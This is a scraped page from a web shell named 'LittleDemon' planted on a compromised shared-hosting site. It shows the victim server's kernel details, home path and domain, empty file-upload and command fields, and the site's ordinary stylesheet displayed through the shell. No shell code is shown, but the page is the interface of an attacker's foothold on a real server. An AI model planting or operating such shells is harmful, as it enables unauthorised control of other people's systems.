LittleDemon WebShell


Linux in-mum-web1499.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
Path : /home/u901718425/domains/rohanekambalewadi.homes/public_html/
File Upload :
Command :
Current File : /home/u901718425/domains/rohanekambalewadi.homes/public_html/style.css

.active{
    display: flex !important;
}

.navbar{
    box-shadow: 0 2px 16px -5px gray;
        z-index: 4;
}

.text-justify {
    text-align: justify;
}

.fixed-nav {
    position: fixed !important;
    top: 0 !important;
    z-index: 4;
    width: -webkit-fill-available;
}

.carousel-item img{
  height: 600px !important;
}
@media screen and (max-width: 580px) {
  .carousel-item img{
    height: auto !important;
  }
  .about-column{
    flex-direction: column;
  }
}

.popup-form{
  cursor: pointer;
}
.main-color{
    color: var(--theme-color);
}
.main-bg-color{
    background-color: var(--theme-color) !important;
    color: var(--btn-color) !important;
}
/* .main-bg-color:hover{
    background-color: linear-gradient(179deg, var(--theme-color), var(--theme-color-dark)) !important;
    color: var(--btn-color) !important;
} */

.btn-custom{
    border-color: var(--theme-color);
    background-color: rgba(var(--theme-color), 0.9) !important;
    color: var(--theme-color);
}
.btn-custom:hover{
    background-color: var(--theme-color) !important;
    color: var(--btn-color) !important;
}


a, a:hover, a:focus, a:active {
    text-decoration: none;
    outline: none;
}
ul {
    margin: 0;
    padding: 0;
    list-style: none;
}
.bg-gray {
    background-color: #f9f9f9;
}
.bg-light{
    background-color: #d9d9d9 !important;
}
.site-heading h2 {
  display: block;
  font-weight: 700;
  margin-bottom: 10px;
  text-transform: uppercase;
}

.site-heading h2 span {
  color: var(--theme-color);
}

.site-heading h4 {
  display: inline-block;
  padding-bottom: 20px;
  position: relative;
  text-transform: capitalize;
  z-index: 1;
}

.site-heading h4::before {
  background: var(--theme-color) none repeat scroll 0 0;
  bottom: 0;
  content: "";
  height: 2px;
  left: 50%;
  margin-left: -25px;
  position: absolute;
  width: 50px;
}

.site-heading {
  margin-bottom: 60px;
  overflow: hidden;
  margin-top: -5px;
}

.carousel-shadow .owl-stage-outer {
  margin: -15px -15px 0;
  padding: 15px;
}

.we-offer-area .our-offer-carousel .owl-dots .owl-dot span {
  background: #ffffff none repeat scroll 0 0;
  border: 2px solid;
  height: 15px;
  margin: 0 5px;
  width: 15px;
}

.we-offer-area .our-offer-carousel .owl-dots .owl-dot.active span {
  background: var(--theme-color) none repeat scroll 0 0;
  border-color: var(--theme-color);
}

.we-offer-area .item {
  background: #ffffff none repeat scroll 0 0;
  border-left: 2px solid var(--theme-color);
  -moz-box-shadow: 0 0 10px #cccccc;
  -webkit-box-shadow: 0 0 10px #cccccc;
  -o-box-shadow: 0 0 10px #cccccc;
  box-shadow: 0 0 10px #cccccc;
  overflow: hidden;
  padding: 30px;
  position: relative;
  z-index: 1;
}

.we-offer-area.text-center .item {
  background: #ffffff none repeat scroll 0 0;
  border: medium none;
  padding: 67px 40px 64px;
}

.we-offer-area.text-center .item i {
  background: var(--theme-color) none repeat scroll 0 0;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
  color: #ffffff;
  font-size: 40px;
  height: 80px;
  line-height: 80px;
  position: relative;
  text-align: center;
  width: 80px;
  z-index: 1;
  transition: all 0.35s ease-in-out;
  -webkit-transition: all 0.35s ease-in-out;
  -moz-transition: all 0.35s ease-in-out;
  -ms-transition: all 0.35s ease-in-out;
  -o-transition: all 0.35s ease-in-out;
  margin-bottom: 25px;
}

.we-offer-area.text-center .item i::after {
  border: 2px solid var(--theme-color);
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
  content: "";
  height: 90px;
  left: -5px;
  position: absolute;
  top: -5px;
  width: 90px;
  z-index: -1;
  transition: all 0.35s ease-in-out;
  -webkit-transition: all 0.35s ease-in-out;
  -moz-transition: all 0.35s ease-in-out;
  -ms-transition: all 0.35s ease-in-out;
  -o-transition: all 0.35s ease-in-out;
}

.we-offer-area.item-border-less .item {
  border: medium none;
}

.we-offer-area .our-offer-items.less-carousel .equal-height {
  margin-bottom: 30px;
}

.we-offer-area.item-border-less .item .number {
  font-family: "Poppins",sans-serif;
  font-size: 50px;
  font-weight: 900;
  opacity: 0.1;
  position: absolute;
  right: 30px;
  top: 30px;
}

.our-offer-carousel.center-active .owl-item:nth-child(2n) .item,
.we-offer-area.center-active .single-item:nth-child(2n) .item {
  background: var(--theme-color) none repeat scroll 0 0;
}

.our-offer-carousel.center-active .owl-item:nth-child(2n) .item i,
.our-offer-carousel.center-active .owl-item:nth-child(2n) .item span,
.our-offer-carousel.center-active .owl-item:nth-child(2n) .item p,
.we-offer-area.center-active .single-item:nth-child(2n) .item i,
.we-offer-area.center-active .single-item:nth-child(2n) .item span,
.we-offer-area.center-active .single-item:nth-child(2n) .item p {
  color: #ffffff;
}

.we-offer-area .item i {
  color: var(--theme-color);
  display: inline-block;
  font-size: 60px;
  margin-bottom: 20px;
}

.we-offer-area .item h4 {
  font-weight: 600;
  text-transform: capitalize;
}

.we-offer-area .item p {
  margin: 0;
}

.we-offer-area .item i,
.we-offer-area .item span,
.we-offer-area .item p {
  transition: all 0.35s ease-in-out;
  -webkit-transition: all 0.35s ease-in-out;
  -moz-transition: all 0.35s ease-in-out;
  -ms-transition: all 0.35s ease-in-out;
  -o-transition: all 0.35s ease-in-out;
}

.we-offer-area .item::after {
  background: var(--theme-color) none repeat scroll 0 0;
  content: "";
  height: 100%;
  left: -100%;
  position: absolute;
  top: 0;
  transition: all 0.35s ease-in-out;
  -webkit-transition: all 0.35s ease-in-out;
  -moz-transition: all 0.35s ease-in-out;
  -ms-transition: all 0.35s ease-in-out;
  -o-transition: all 0.35s ease-in-out;
  width: 100%;
  z-index: -1;
}

.we-offer-area .item:hover::after {
  left: 0;
}

.we-offer-area .item:hover i,
.we-offer-area .item:hover span,
.we-offer-area .item:hover p {
  color: #ffffff !important;
}

.we-offer-area.text-center .item:hover i::after {
  border-color: #ffffff !important;
}

.we-offer-area.text-center .item:hover i {
  background-color: #ffffff !important;
  color: var(--theme-color) !important;
}

.we-offer-area.text-left .item i {
  background: var(--theme-color) none repeat scroll 0 0;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
  color: #ffffff;
  display: inline-block;
  font-size: 60px;
  height: 100px;
  line-height: 100px;
  margin-bottom: 30px;
  position: relative;
  width: 100px;
  z-index: 1;
  text-align: center;
}

.we-offer-area.text-left .item i::after {
  border: 2px solid var(--theme-color);
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
  content: "";
  height: 120px;
  left: -10px;
  position: absolute;
  top: -10px;
  width: 120px;
}







aside {
    width: 30%;
    padding-left: 15px;
    margin-left: 15px;
    float: right;
    font-style: italic;
    background-color: lightgray;
  }
  
  .bg-black{
    background: #424242 !important;
  
  }
  .text-white{
      color:  white;
  }
  .text-black{
      color:  black;
  }
  .bg-primary-orange{
    background-color: #fec503;
  }
  .primary-orange{
    color: #fec503;
  }
  .org-btn{
    border: 1px solid #fec503;
    color: #fec503;
  }
  .org-btn:hover{
    background-color: #fec503;
    color: white;
  }
  
  .light-grey{
    color:#6c757d;
  }
  
  .bg-light-grey{
    background-color: #6c757d;
  }
  
  .social-buttons-circle-dark-grey{
    background:  #1a1d20;
  }
  
  /* img css */
  
  /* .testimonals-container img{
    width:300px;
    
  } */
  
  .hover-img{
    transition: 0.5s ease-out;
  }
  .gallery{
    width: 80% !important;
    height: auto !important;
    aspect-ratio: 4 /3;
  }
  
  @media screen and (max-width: 580px) {
      .gallery{
        width: 100% !important;
        height: auto !important;
        aspect-ratio: 4 /3;
      }
  }
/* .hover-img:hover{
  box-shadow: 0 0 16px -5px gray;
  transform: scale(1.09);
} */


  /* hero */
  .center{
    text-align: center;
  }
  
  
  /*  Card hover */
  .move-up:hover{
    /* color: var(--theme-color) !important; */
    background-color: var(--btn-color) !important;
      transition: all .5s;
      transform : translateY(-10px);
  }
  .move-up:hover  .card-header{
    background-color: var(--theme-color) !important;
    color: var(--btn-color) !important;
  }
  
  .ng-mrg-t{
    margin-top: -50px;
  }
  
  @keyframes beat-fade {
    0% {
        transform: scale(1),rotate(270deg);
        opacity: 0.2;
    }
    50% {
        transform: scale(1.2),rotate(270deg);
        opacity: 1;
    }
    100% {
        transform: scale(1),rotate(270deg);
        opacity: 0.2;
    }
}


.beat-fade-element {
    animation: beat-fade 1s ease-in-out infinite;
}


 @keyframes color-changer {
    0% {
        color: yellow ;
        transform: scale(1);
        opacity: 0.2;
    }
    50% {
        color: orange ;
        transform: scale(1.2);
        opacity: 1;
    }
    100% {
        color: red ;
        transform: scale(1);
        opacity: 0.2;
    }
}
.color-changer{
     animation: color-changer 1s ease-in-out infinite;
}

LittleDemon - FACEBOOK
[ KELUAR ]